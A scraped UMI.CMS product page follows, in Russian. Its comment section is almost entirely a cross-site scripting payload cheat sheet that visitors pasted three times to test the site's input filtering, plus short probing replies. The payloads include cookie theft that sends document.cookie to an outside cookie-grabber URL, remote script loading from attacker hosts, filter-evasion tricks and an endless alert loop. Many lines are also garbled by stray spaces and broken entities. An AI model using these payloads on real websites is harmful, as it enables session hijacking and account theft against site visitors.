<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite....okiegrabber.php";></script>
<script>location.href="http://www.evilsite....ber.php?cookie=";+escape(document.co
okie)</script>
');alert('xek&# 39;);//
& lt;scr<script>ipt>ale rt('XSS');</scr</script& gt;ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
& lt;style>@im\port'\ja\vasc\ ript:alert(\"XSS\")' ;</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
& lt;marquee><script>al ert('XSS')</script></ marquee>
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
"><script src=http://yoursite.com/your_files.js>;</script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
'); alert('XSS
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div
s tyle="x:expression((windo w.r==1)?'':eval('r=1;alert(Str ing.fromCharCode(88,83,83));') )">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
' ">><marquee>& lt;h1>XSS</h1></ma rquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE t ype="text/css">BO DY{background:url("javasc ript:alert('XSS')")}</ STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: u rl(\"javascript:alert('XS S')\");}</STYLE>< ;UL><LI>XSS
perl -e 'print \ "<SCR\0IPT>alert(\& quot;XSS\")</SCR\0IPT& gt;\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
& lt;/textarea>'">< ;script>alert(document.cook ie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
& lt;/script></script>& lt;<<<script><& gt;>>><<<scr ipt>alert(123)</script&g t;
& lt;html><noalert>< noscript>(123)</noscript ><script>(123)</sc ript>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
} </style><script>a= eval;b=alert;a(b(/XSS/.source) );</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a ="get";b="URL&q uot;;c="javascript:" ;d="alert('xss');";e val(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body b ackground=javascript:'"&g t;<script>alert(navigato r.userAgent)</script>> ;</body>
& quot;>/XaDoS/><script >alert(document.cookie)< /script><script
src="http://www.site.com/XSS.js";></script>
d ata:text/html;charset=utf-7;ba se64,Ij48L3RpdGxlPjxzY3JpcHQ+Y WxlcnQoMTMzNyk8L3NjcmlwdD4=
Новости UMI.CMS
Отзывы клиентов
Д.Е. Сизов, начальник IT-отдела Инжинирингового Центра «Энерго»
«...
UMI.CMS позволяет нам самостоятельно управлять сайтом. Сотрудники компании, ответственные за контент, могут сами обновлять информацию в соответствующих разделах...»
Все отзывы о UMI.CMS
Уважаемые посетители! Сообщаем вам, что Служба Заботы прекратила поддержку UMI.CMS на форуме.
Для связи со Службой Заботы пользуйтесь формой обратной связи
<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.ph
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite....okiegrabber.php";></script>
<script>location.href="http://www.evilsite....ber.php?cookie=";+escape(document.co
okie)</script>
');alert('xek&# 39;);//
& lt;scr<script>ipt>ale rt('XSS');</scr</script& gt;ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
& lt;style>@im\port'\ja\vasc\ ript:alert(\"XSS\")' ;</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
& lt;marquee><script>al ert('XSS')</script></ marquee>
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
"><script src=http://yoursite.com/your_files.js>;</script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
'); alert('XSS
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div
s tyle="x:expression((windo w.r==1)?'':eval('r=1;alert(Str ing.fromCharCode(88,83,83));') )">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
' ">><marquee>& lt;h1>XSS</h1></ma rquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE t ype="text/css">BO DY{background:url("javasc ript:alert('XSS')")}</ STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: u rl(\"javascript:alert('XS S')\");}</STYLE>< ;UL><LI>XSS
perl -e 'print \ "<SCR\0IPT>alert(\& quot;XSS\")</SCR\0IPT& gt;\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
& lt;/textarea>'">< ;script>alert(document.cook ie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
& lt;/script></script>& lt;<<<script><& gt;>>><<<scr ipt>alert(123)</script&g t;
& lt;html><noalert>< noscript>(123)</noscript ><script>(123)</sc ript>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
} </style><script>a= eval;b=alert;a(b(/XSS/.source) );</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a ="get";b="URL&q uot;;c="javascript:" ;d="alert('xss');";e val(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body b ackground=javascript:'"&g t;<script>alert(navigato r.userAgent)</script>> ;</body>
& quot;>/XaDoS/><script >alert(document.cookie)< /script><script
src="http://www.site.com/XSS.js";></script>
d ata:text/html;charset=utf-7;ba se64,Ij48L3RpdGxlPjxzY3JpcHQ+Y WxlcnQoMTMzNyk8L3NjcmlwdD4=
Цитировать
<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.ph
(11.03.10 04:01)
<script>alert('XSS');</script>
<script src="http://www.evilsite....okiegrabber.php";></script>
<script>location.href="http://www.evilsite....ber.php?cookie=";+escape(document.co
okie)</script>
');alert('xek&# 39;);//
& lt;scr<script>ipt>ale rt('XSS');</scr</script& gt;ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
& lt;style>@im\port'\ja\vasc\ ript:alert(\"XSS\")' ;</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
& lt;marquee><script>al ert('XSS')</script></ marquee>
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
"><script src=http://yoursite.com/your_files.js>;</script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
'); alert('XSS
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div
s tyle="x:expression((windo w.r==1)?'':eval('r=1;alert(Str ing.fromCharCode(88,83,83));') )">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
' ">><marquee>& lt;h1>XSS</h1></ma rquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE t ype="text/css">BO DY{background:url("javasc ript:alert('XSS')")}</ STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: u rl(\"javascript:alert('XS S')\");}</STYLE>< ;UL><LI>XSS
perl -e 'print \ "<SCR\0IPT>alert(\& quot;XSS\")</SCR\0IPT& gt;\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
& lt;/textarea>'">< ;script>alert(document.cook ie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
& lt;/script></script>& lt;<<<script><& gt;>>><<<scr ipt>alert(123)</script&g t;
& lt;html><noalert>< noscript>(123)</noscript ><script>(123)</sc ript>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
} </style><script>a= eval;b=alert;a(b(/XSS/.source) );</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a ="get";b="URL&q uot;;c="javascript:" ;d="alert('xss');";e val(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body b ackground=javascript:'"&g t;<script>alert(navigato r.userAgent)</script>> ;</body>
& quot;>/XaDoS/><script >alert(document.cookie)< /script><script
src="http://www.site.com/XSS.js";></script>
d ata:text/html;charset=utf-7;ba se64,Ij48L3RpdGxlPjxzY3JpcHQ+Y WxlcnQoMTMzNyk8L3NjcmlwdD4=
Re: <script>alert(document.cookie)</script>
Я тоже попробую)
<script>alert("Hello htmlspecialchars!");</script>
Цитировать
Peter
(12.03.10 06:39)
<script>alert("Hello htmlspecialchars!");</script>
Re: <script>alert(document.cookie)</script>
Разве <script></script> где-то ещё не режется?
Цитировать
Никита
(31.03.10 14:04)
Re: <script>alert(document.cookie)</script>
"><script>alert(document. cookie)</script>
Цитировать
"><script>alert(document. cookie)</script>
(18.04.10 22:19)
Re: <script>alert(document.cookie)</script>
(script)alert()(/script)
Цитировать
(script)alert()(/script)
(04.06.10 02:46)
<script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
Цитировать
<script>alert(document.cookie)</script>
(06.06.10 18:51)
Re: <script>alert(document.cookie)</script>
<script>alert("Hello!");</script>
Цитировать
Аноним
(13.06.10 19:06)
Re: <script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
& lt;scr<script>ipt>ale rt(document.cookie)</scr< ;/script>ipt>
Цитировать
<script>alert(document.cookie)</script>
(29.07.10 12:24)
& lt;scr<script>ipt>ale rt(document.cookie)</scr< ;/script>ipt>
© ООО «Юмисофт», 2010
+7 (812) 309-03-15
+7 (495) 662-87-59
+7 (495) 662-87-59
Выдано лицензий: 50567
Документация
Нашёл ошибку? Сообщи!
Прямая связь с Зимним